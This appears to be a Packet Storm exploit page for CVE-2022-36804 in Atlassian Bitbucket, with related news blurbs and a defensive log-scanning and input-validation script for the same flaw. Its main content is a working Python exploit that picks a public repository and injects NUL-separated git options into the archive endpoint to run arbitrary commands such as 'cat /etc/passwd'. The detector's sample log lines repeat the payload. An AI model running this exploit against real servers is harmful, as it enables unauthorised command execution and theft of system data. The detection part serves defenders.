Bitbucket 7.0.0 Remote Command Execution

Bitbucket version 7.0.0 suffers from a remote command execution vulnerability.

Packet Storm
Tags: vulnerability, ubuntu, git, rce, auth, bitbucket

#!/usr/bin/python3
# Exploit Title: Bitbucket v7.0.0 - RCE
# Date: 09-23-2022
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804
#****************************************************************#
# The following exploit is used to exploit a vulnerability present in
# Atlassian Bitbucket Server and Data Center 7.0.0 before version
# 7.6.17, from version 7.7.0 before version 7.17.10, from version
# 7.18.0 before version 7.21.4, from version 8.0.0 before version
# 8.0.3, from version 8.1.0 before version 8.1.3, and from version
# 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
#
# Usage Example
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
#
# The server will send a 500 http response with the stdout output from the
# command executed.
#****************************************************************#
import argparse
import re
import urllib.error
import urllib.parse
from urllib import request

# argument setup
parser = argparse.ArgumentParser(
    description='Program to test bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.[REQUIRED]",
                    required=True)
parser.add_argument("--cmd", help="Set the command to execute.[DEFAULT ID]",
                    default='id')
args = parser.parse_args()

cmd = urllib.parse.quote(args.cmd)

# reads from the public repository listing what is available
requ = request.urlopen(args.url + "/repos?visibility=public")
response = requ.read()

# selects a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
                     str(re.findall('7990/projects/(.*)/repos/',
                                    str(response))[-1]))[-1]

# selects a public repo and stores it in a variable
file = re.findall('/repos/(.*)/browse',
                  str(re.findall('7990/projects/(.*)/repos/',
                                 str(response))[-1]))[0]

# Exploitation
try:
    attack = request.urlopen(args.url + "/rest/api/latest/projects/" + project
                             + "/repos/" + file
                             + "/archive?prefix=ax%00--exec=%60" + cmd
                             + "%60%00--remote=origin")
    # Non-error response: print the body as-is
    print(attack.read().decode())
except urllib.error.HTTPError as e:
    body = e.read().decode()  # Read the body of the error response
    print(body)

Related news

Atlassian Releases Patches for Critical Flaws Affecting Crowd and Bitbucket Products

Australian software company Atlassian has rolled out security updates to address two critical flaws affecting Bitbucket Server, Data Center, and Crowd products. The issues, tracked as CVE-2022-43781 and CVE-2022-43782, are both rated 9 out of 10 on the CVSS vulnerability scoring system. CVE-2022-43781, which Atlassian said was introduced in version 7.0.0 of Bitbucket Server and Data Center,

Actively exploited vulnerability in Bitbucket Server and Data Center

International cybersecurity authorities are warning about the active exploitation of a vulnerability in Bitbucket Server and Data Center. The post Actively exploited vulnerability in Bitbucket Server and Data Center appeared first on Malwarebytes Labs.

CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary

Bitbucket Git Command Injection

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection vulnerability in multiple API endpoints. The /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive endpoint creates an archive of the repository, leveraging the git-archive command to do so. Supplying NULL bytes to the request enables the passing of additional arguments to the command, ultimately enabling execution of arbitrary commands.
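The paragraph above describes the injection shape: NUL bytes inside a query parameter split one value into several arguments for git-archive, and any fragment beginning with a dash is then parsed by git as an option. The following detector, an added example that is not part of the Packet Storm post or of Atlassian's code, applies that description from the defender's side. It scans access-log lines for requests to the archive endpoint whose parameters decode to a NUL byte or to an option-like fragment, and it also shows the server-side validation rule that would reject such values. The log line format, the sample lines, the client addresses and the project and repository names are all constructed for this example, and the path regex assumes the documented `/rest/api/latest/...` and `/rest/api/1.0/...` prefixes.

```python
"""
Detection and input-validation helpers for argument injection against the
Bitbucket repository archive endpoint (CVE-2022-36804 pattern).

Added example, not code from Packet Storm, the exploit author or Atlassian.
The log format and every sample line below are constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Archive endpoint as given in the advisory text:
#   /rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive
# (the "1.0" alternative is an assumption about the versioned API prefix)
ARCHIVE_PATH = re.compile(
    r"^/rest/api/(?:latest|1\.0)/projects/[^/]+/repos/[^/]+/archive/?$"
)

# Common-log-style access line (constructed format for this example):
#   <client> - <user> [<time>] "<method> <target> <proto>" <status> <bytes>
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)


def suspicious_values(query: str) -> list:
    """Return (name, value_or_fragment, reason) tuples for query parameters
    that look like git option injection: an embedded NUL byte, or any
    NUL-separated fragment that begins with '-'.  The value is percent-decoded
    a second time so a double-encoded %2500 is still caught."""
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = unquote(raw)  # parse_qsl decoded once; handle double encoding
        if "\x00" in value:
            findings.append((name, value, "NUL byte"))
        # Each NUL-separated fragment becomes its own argv entry for git,
        # so every fragment is inspected, not only the start of the value.
        for frag in value.split("\x00"):
            if frag.startswith("-"):
                findings.append((name, frag, "option-like argument"))
    return findings


def analyze_log_line(line: str):
    """Parse one access-log line and return a finding dict, or None when the
    request is not an archive request carrying an injection pattern."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not ARCHIVE_PATH.match(parts.path):
        return None
    hits = suspicious_values(parts.query)
    if not hits:
        return None
    return {
        "client": m.group("client"),
        "status": int(m.group("status")),
        "path": parts.path,
        "reasons": sorted({h[2] for h in hits}),
        "params": sorted({h[0] for h in hits}),
    }


def validate_archive_param(value: str) -> bool:
    """Server-side rule: a value that could become an extra git argument is
    rejected.  Returns True only when the value is safe to pass through."""
    if "\x00" in value:
        return False
    return not value.startswith("-")


# Constructed sample log lines (not real traffic).  Line 2 mirrors the
# payload shape already shown on this page; line 3 is the single-encoded
# dash form; lines 1 and 4 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Sep/2022:10:01:02 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip&prefix=release/ HTTP/1.1" 200 51234',
    '10.0.0.9 - - [23/Sep/2022:10:01:07 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 143',
    '10.0.0.9 - - [23/Sep/2022:10:01:09 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?prefix=%2D%2Dremote=origin HTTP/1.1" 500 143',
    '10.0.0.7 - - [23/Sep/2022:10:02:00 +0000] "GET /projects/PROJ/repos/app/browse?prefix=%00 HTTP/1.1" 200 9001',
]


def scan(lines):
    """Run the detector over an iterable of log lines and collect findings."""
    return [f for f in (analyze_log_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two design points: the detector matches on the decoded parameter value rather than on a literal `%00` in the raw line, so double encoding or a different parameter name does not slip past it, and a 500 status on an archive request with such a parameter is the same symptom the exploit's own comment describes (the command output comes back in the error body), which makes the status column a useful secondary signal when hunting in older logs.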

Critical Vulnerability Discovered in Atlassian Bitbucket Server and Data Center

Atlassian has rolled out fixes for a critical security flaw in Bitbucket Server and Data Center that could lead to the execution of malicious code on vulnerable installations. Tracked as CVE-2022-36804 (CVSS score: 9.9), the issue has been characterized as a command injection vulnerability in multiple endpoints that could be exploited via specially crafted HTTP requests. “An

CVE-2022-36804: [BSERV-13438] Critical severity command injection vulnerability - CVE-2022-36804

Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allow remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
